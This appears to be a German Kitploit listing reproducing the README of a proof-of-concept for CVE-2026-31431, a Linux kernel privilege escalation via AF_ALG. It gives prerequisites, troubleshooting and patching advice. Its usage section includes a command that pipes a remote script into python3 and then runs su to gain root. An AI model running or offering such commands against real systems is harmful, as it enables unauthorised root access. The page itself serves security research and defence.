Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431 — # Bildungskonzept-Nachweis zur Demonstration lokaler Privilegienerweiterung im Linux-Kernel über AF_ALG algif_aead (CVE-2026-31431). Enthält Nutzungsanweisungen und Abhilfemaßnahmen für defensive Forschung. | Kitploit
Tools/GitHubGitHub/ademzero/cve-2026-31431
Privilege EscalationSchwachstellenanalyseExploitationLernen & Bildung
GitHubademzero/cve-2026-31431

CVE-2026-31431

# Bildungskonzept-Nachweis zur Demonstration lokaler Privilegienerweiterung im Linux-Kernel über AF_ALG algif_aead (CVE-2026-31431). Enthält Nutzungsanweisungen und Abhilfemaßnahmen für defensive Forschung.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-31431 - Copy Fail PoC

Bildungs-PoC für CVE-2026-31431, auch bekannt als Copy Fail, eine lokale Privilege-Escalation-Schwachstelle im Linux-Kernel, die die kryptografische Schnittstelle AF_ALG / algif_aead betrifft.

[!WARNING] Dieses Repository wird ausschließlich für Bildungs-, Verteidigungs- und autorisierte Sicherheitsforschungszwecke bereitgestellt.

Führen Sie diesen Code nicht auf Systemen aus, die Ihnen nicht gehören, oder auf Systemen, für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.

Unautorisierte Nutzung kann illegal sein.


Übersicht

CVE-2026-31431 ist eine lokale Privilege-Escalation-Schwachstelle im Linux-Kernel, die das kryptografische Subsystem des Kernels betrifft.

Die Schwachstelle betrifft den AEAD-Pfad, der über die AF_ALG-Schnittstelle bereitgestellt wird, und kann es einem lokalen Benutzer ohne Privilegien ermöglichen, in die Page-Cache-Daten lesbarer Dateien einzugreifen, was potenziell zu einer Privilege-Escalation auf verwundbaren Systemen führen kann.

Dieses Repository enthält einen minimalen Bildungs-PoC, der für kontrollierte Laborumgebungen gedacht ist.


Anforderungen

Das Zielsystem muss den erforderlichen AF_ALG-AEAD-Algorithmus bereitstellen.

Sie können dies wie folgt überprüfen:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

Der PoC erwartet Unterstützung für einen Algorithmus ähnlich wie:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

Wenn der Algorithmus nicht verfügbar ist, kann der PoC mit einem Fehler wie diesem fehlschlagen:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

Das bedeutet, dass der erforderliche Kernel-Krypto-Algorithmus auf dem System nicht verfügbar ist.


Verwendung

Repository klonen:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

PoC ausführen:

root@kitploit:~
python3 poc.py

Oder direkt ausführen:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

Kompatibilitätshinweise

Einige Linux-Systeme verwenden /bin/su anstelle von /usr/bin/su. Sie können den korrekten Pfad wie folgt überprüfen:

root@kitploit:~
which su

Falls erforderlich, passen Sie den Zielpfad in poc.py an.


Fehlerbehebung

Fehlender AEAD-Algorithmus

Wenn Sie beim Binden an authencesn(hmac(sha256),cbc(aes)) die Meldung FileNotFoundError: [Errno 2] No such file or directory erhalten, ist der erforderliche Kernel-Algorithmus nicht verfügbar.

Verfügbare Krypto-Algorithmen prüfen:

root@kitploit:~
cat /proc/crypto

oder spezifischer:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

Falscher su-Pfad

Wenn der PoC auf /usr/bin/su verweist, Ihr System aber /bin/su verwendet, prüfen Sie dies mit:

root@kitploit:~
which su

Aktualisieren Sie dann den Pfad in poc.py entsprechend.


Gegenmaßnahmen

Verteidiger sollten auf eine gepatchte Linux-Kernel-Version aktualisieren, die vom jeweiligen Distributionsanbieter bereitgestellt wird.

Nach dem Aktualisieren des Kernels sollte das System neu gestartet werden, um sicherzustellen, dass der gepatchte Kernel aktiv ist.

Vorübergehende Gegenmaßnahmen können je nach Umgebung und Distribution die Einschränkung des Zugriffs auf betroffene Kernel-Krypto-Funktionen umfassen.


Rechtlicher Haftungsausschluss

Dieses Projekt ist ausschließlich für folgende Zwecke gedacht:

  • Sicherheitsforschung
  • Verteidigungsvalidierung
  • Bildungszwecke
  • Autorisierte Labortests

Der Autor ist nicht verantwortlich für Missbrauch, Schäden oder illegale Aktivitäten, die durch diesen Code verursacht werden.

Verwenden Sie ihn nur auf Systemen, für die Sie eine ausdrückliche Autorisierung haben.


Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert.

Tool herunterladen